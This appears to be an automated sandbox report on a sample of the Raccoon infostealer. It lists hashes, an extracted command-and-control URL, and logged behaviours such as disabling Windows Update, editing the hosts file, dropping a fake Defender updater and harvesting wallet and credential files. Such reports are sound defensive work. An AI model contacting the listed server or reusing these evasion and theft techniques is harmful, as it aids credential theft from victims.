raccoon | d4696b99aae2a8c0b6117c12181ce3b23c2b8b3f0a29d7993a968ec2dcf446f4

Analysis

max time kernel
126s
max time network
154s
platform
windows10-2004_x64
resource
win10v2004-20220812-en
resource tags

arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
submitted
08/09/2022, 00:01

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

d4696b99aae2a8c0b6117c12181ce3b23c2b8b3f0a29d7993a968ec2dcf446f4.exe
Size

386KB
MD5

1b318f1b8b06927c70445fb204cde589
SHA1

424c22ee84b9b94efe8cd9f9d8c15a3cbfb2837b
SHA256

d4696b99aae2a8c0b6117c12181ce3b23c2b8b3f0a29d7993a968ec2dcf446f4
SHA512

3c1779c3f9fc02fa43e0746b39f44755121a6a58c0cb6b9b2253b22f538aaff144955308c8580956f943ac17d62fbc9744fe730c21320eef142c11890acab2a6
SSDEEP

12288:p+1TAJgO0d5vgEiySZhb0sJYuVka7CpNIc3r:I1OEifHb08Xk

Score

10^/10

raccoon 654b3e7f2d409dcde795b5d2dacf4955 discovery evasion exploit spyware stealer

Malware Config

Extracted

Family

raccoon

Botnet

654b3e7f2d409dcde795b5d2dacf4955

http://46.249.58.152/

rc4.plain

Signatures

Modifies security service 2 TTPs 5 IoCs

evasion

Modify Registry

T1112

Modify Existing Service

T1031

description	ioc	Process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0	reg.exe

Raccoon
Raccoon is an infostealer written in C++ and first seen in 2019.
stealer raccoon

Suspicious use of NtCreateProcessExOtherParentProcess 13 IoCs

description	pid	Process	procid_target
PID 4780 created 3276	4780	WerFault.exe	38
PID 2544 created 4164	2544	WerFault.exe	33
PID 1684 created 2404	1684	WerFault.exe	189
PID 4868 created 2500	4868	WerFault.exe	190
PID 2864 created 832	2864	WerFault.exe	195
PID 2332 created 408	2332	WerFault.exe	197
PID 4740 created 1732	4740	WerFault.exe	201
PID 1716 created 4620	1716	WerFault.exe	207
PID 1228 created 4744	1228	DllHost.exe	213
PID 4192 created 4236	4192	WerFault.exe	216
PID 3280 created 1948	3280	WerFault.exe	219
PID 4556 created 3084	4556	WerFault.exe	222
PID 944 created 1240	944	WerFault.exe	225

Suspicious use of NtCreateUserProcessOtherParentProcess 17 IoCs

description	pid	Process	procid_target
PID 3516 created 580	3516	powershell.EXE	3
PID 4540 created 3276	4540	svchost.exe	38
PID 4540 created 4164	4540	svchost.exe	33
PID 1140 created 580	1140	powershell.EXE	3
PID 4540 created 2404	4540	svchost.exe	189
PID 4540 created 2500	4540	svchost.exe	190
PID 4540 created 832	4540	svchost.exe	195
PID 4540 created 408	4540	svchost.exe	197
PID 4540 created 1732	4540	svchost.exe	201
PID 4540 created 2400	4540	svchost.exe	202
PID 4540 created 4336	4540	svchost.exe	208
PID 4540 created 4620	4540	svchost.exe	207
PID 4540 created 4744	4540	svchost.exe	213
PID 4540 created 4236	4540	svchost.exe	216
PID 4540 created 1948	4540	svchost.exe	219
PID 4540 created 3084	4540	svchost.exe	222
PID 4540 created 1240	4540	svchost.exe	225

Downloads MZ/PE file

Drops file in Drivers directory 2 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\drivers\etc\hosts	conhost.exe
File opened for modification	C:\Windows\system32\drivers\etc\hosts	conhost.exe

Executes dropped EXE 4 IoCs

pid	Process
4352	Zd60uZ7J.exe
2252	conhost.exe
2444	update.exe
1496	dialer.exe

Possible privilege escalation attempt 4 IoCs

exploit

pid	Process
3484	takeown.exe
4964	icacls.exe
4764	takeown.exe
4996	icacls.exe

Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

Loads dropped DLL 3 IoCs

pid	Process
2448	AppLaunch.exe
2448	AppLaunch.exe
2448	AppLaunch.exe

Modifies file permissions 1 TTPs 4 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
3484	takeown.exe
4964	icacls.exe
4764	takeown.exe
4996	icacls.exe

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Drops file in System32 directory 13 IoCs

description	ioc	Process
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.EXE.log	powershell.EXE
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506	svchost.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.EXE
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Roaming\42B1.tmp	conhost.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\conhost.exe.log	conhost.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.EXE
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log	powershell.EXE
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx	svchost.exe

Suspicious use of SetThreadContext 5 IoCs

description	pid	Process	procid_target
PID 4944 set thread context of 2448	4944	d4696b99aae2a8c0b6117c12181ce3b23c2b8b3f0a29d7993a968ec2dcf446f4.exe	83
PID 2424 set thread context of 2252	2424	conhost.exe	118
PID 3516 set thread context of 4060	3516	powershell.EXE	137
PID 1140 set thread context of 4264	1140	powershell.EXE	149
PID 908 set thread context of 1496	908	conhost.exe	184

Drops file in Program Files directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\Platform\Defender\update.exe	conhost.exe
File created	C:\Program Files\Google\Libs\WR64.sys	conhost.exe
File created	C:\Program Files\Platform\Defender\update.exe	conhost.exe

Drops file in Windows directory 4 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Tasks\dialersvc32.job	conhost.exe
File created	C:\Windows\Tasks\dialersvc64.job	conhost.exe
File opened for modification	C:\Windows\Tasks\dialersvc64.job	conhost.exe
File created	C:\Windows\Tasks\dialersvc32.job	conhost.exe

Launches sc.exe 10 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
1904	sc.exe
3632	sc.exe
736	sc.exe
4544	sc.exe
4668	sc.exe
2656	sc.exe
4184	sc.exe
4584	sc.exe
4516	sc.exe
4904	sc.exe

Program crash 32 IoCs

pid	pid_target	Process	procid_target
2160	3276	WerFault.exe	38
4668	4164	WerFault.exe	33
3720	2404	WerFault.exe	189
4668	2500	WerFault.exe	190
3012	832	WerFault.exe	195
1680	408	WerFault.exe	197
3448	1732	WerFault.exe	201
3456	2400	WerFault.exe	202
940	4336	WerFault.exe	208
4256	4620	WerFault.exe	207
1952	4744	WerFault.exe	213
1892	4236	WerFault.exe	216
4544	1948	WerFault.exe	219
1140	3084	WerFault.exe	222
3712	1240	WerFault.exe	225
1940	3684	WerFault.exe	228
1864	1036	WerFault.exe	231
2916	3148	WerFault.exe	234
3632	2424	WerFault.exe	237
3692	4476	WerFault.exe	240
5004	1228	WerFault.exe	243
4644	3132	WerFault.exe	246
4544	224	WerFault.exe	249
2732	4240	WerFault.exe	252
4324	4860	WerFault.exe	255
3100	1644	WerFault.exe	258
2432	3448	WerFault.exe	261
1732	3120	WerFault.exe	264
1436	3772	WerFault.exe	267
3424	3860	WerFault.exe	270
2928	4688	WerFault.exe	273
3720	4940	WerFault.exe	276

Checks processor information in registry 2 TTPs 45 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe

Enumerates system info in registry 2 TTPs 30 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe

Modifies data under HKEY_USERS 64 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	conhost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE

Modifies registry key 1 TTPs 18 IoCs

Modify Registry

T1112

pid	Process
2032	reg.exe
4620	reg.exe
2500	reg.exe
4572	reg.exe
2640	reg.exe
3992	reg.exe
1384	reg.exe
3712	reg.exe
2732	reg.exe
3100	reg.exe
1136	reg.exe
1064	reg.exe
5088	reg.exe
2260	reg.exe
3888	reg.exe
2452	reg.exe
4152	reg.exe
3388	reg.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
612	powershell.exe
612	powershell.exe
3864	powershell.exe
3864	powershell.exe
2424	conhost.exe
3516	powershell.EXE
3516	powershell.EXE
3516	powershell.EXE
4060	dllhost.exe
4060	dllhost.exe
4060	dllhost.exe
4060	dllhost.exe
1140	powershell.EXE
4060	dllhost.exe
4060	dllhost.exe
4060	dllhost.exe
4060	dllhost.exe
4060	dllhost.exe
4060	dllhost.exe
4060	dllhost.exe
4060	dllhost.exe
4060	dllhost.exe
4060	dllhost.exe
4060	dllhost.exe
4060	dllhost.exe
4060	dllhost.exe
4060	dllhost.exe
4060	dllhost.exe
4060	dllhost.exe
4060	dllhost.exe
4060	dllhost.exe
4060	dllhost.exe
4060	dllhost.exe
4060	dllhost.exe
4060	dllhost.exe
4060	dllhost.exe
4060	dllhost.exe
2160	WerFault.exe
2160	WerFault.exe
4060	dllhost.exe
4060	dllhost.exe
4668	WerFault.exe
4668	WerFault.exe
4060	dllhost.exe
4060	dllhost.exe
1140	powershell.EXE
4060	dllhost.exe
4060	dllhost.exe
4060	dllhost.exe
4060	dllhost.exe
4060	dllhost.exe
4060	dllhost.exe
4060	dllhost.exe
4060	dllhost.exe
4540	svchost.exe
4540	svchost.exe
4540	svchost.exe
4540	svchost.exe
4060	dllhost.exe
4060	dllhost.exe
4060	dllhost.exe
4060	dllhost.exe
4060	dllhost.exe
4060	dllhost.exe

Suspicious behavior: LoadsDriver 1 IoCs

pid	Process
652	Process not Found

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	612	powershell.exe
Token: SeShutdownPrivilege	1256	powercfg.exe
Token: SeCreatePagefilePrivilege	1256	powercfg.exe
Token: SeShutdownPrivilege	2192	powercfg.exe
Token: SeCreatePagefilePrivilege	2192	powercfg.exe
Token: SeDebugPrivilege	3864	powershell.exe
Token: SeShutdownPrivilege	3676	powercfg.exe
Token: SeCreatePagefilePrivilege	3676	powercfg.exe
Token: SeShutdownPrivilege	1068	powercfg.exe
Token: SeCreatePagefilePrivilege	1068	powercfg.exe
Token: SeTakeOwnershipPrivilege	3484	takeown.exe
Token: SeIncreaseQuotaPrivilege	3864	powershell.exe
Token: SeSecurityPrivilege	3864	powershell.exe
Token: SeTakeOwnershipPrivilege	3864	powershell.exe
Token: SeLoadDriverPrivilege	3864	powershell.exe
Token: SeSystemProfilePrivilege	3864	powershell.exe
Token: SeSystemtimePrivilege	3864	powershell.exe
Token: SeProfSingleProcessPrivilege	3864	powershell.exe
Token: SeIncBasePriorityPrivilege	3864	powershell.exe
Token: SeCreatePagefilePrivilege	3864	powershell.exe
Token: SeBackupPrivilege	3864	powershell.exe
Token: SeRestorePrivilege	3864	powershell.exe
Token: SeShutdownPrivilege	3864	powershell.exe
Token: SeDebugPrivilege	3864	powershell.exe
Token: SeSystemEnvironmentPrivilege	3864	powershell.exe
Token: SeRemoteShutdownPrivilege	3864	powershell.exe
Token: SeUndockPrivilege	3864	powershell.exe
Token: SeManageVolumePrivilege	3864	powershell.exe
Token: 33	3864	powershell.exe
Token: 34	3864	powershell.exe
Token: 35	3864	powershell.exe
Token: 36	3864	powershell.exe
Token: SeIncreaseQuotaPrivilege	3864	powershell.exe
Token: SeSecurityPrivilege	3864	powershell.exe
Token: SeTakeOwnershipPrivilege	3864	powershell.exe
Token: SeLoadDriverPrivilege	3864	powershell.exe
Token: SeSystemProfilePrivilege	3864	powershell.exe
Token: SeSystemtimePrivilege	3864	powershell.exe
Token: SeProfSingleProcessPrivilege	3864	powershell.exe
Token: SeIncBasePriorityPrivilege	3864	powershell.exe
Token: SeCreatePagefilePrivilege	3864	powershell.exe
Token: SeBackupPrivilege	3864	powershell.exe
Token: SeRestorePrivilege	3864	powershell.exe
Token: SeShutdownPrivilege	3864	powershell.exe
Token: SeDebugPrivilege	3864	powershell.exe
Token: SeSystemEnvironmentPrivilege	3864	powershell.exe
Token: SeRemoteShutdownPrivilege	3864	powershell.exe
Token: SeUndockPrivilege	3864	powershell.exe
Token: SeManageVolumePrivilege	3864	powershell.exe
Token: 33	3864	powershell.exe
Token: 34	3864	powershell.exe
Token: 35	3864	powershell.exe
Token: 36	3864	powershell.exe
Token: SeIncreaseQuotaPrivilege	3864	powershell.exe
Token: SeSecurityPrivilege	3864	powershell.exe
Token: SeTakeOwnershipPrivilege	3864	powershell.exe
Token: SeLoadDriverPrivilege	3864	powershell.exe
Token: SeSystemProfilePrivilege	3864	powershell.exe
Token: SeSystemtimePrivilege	3864	powershell.exe
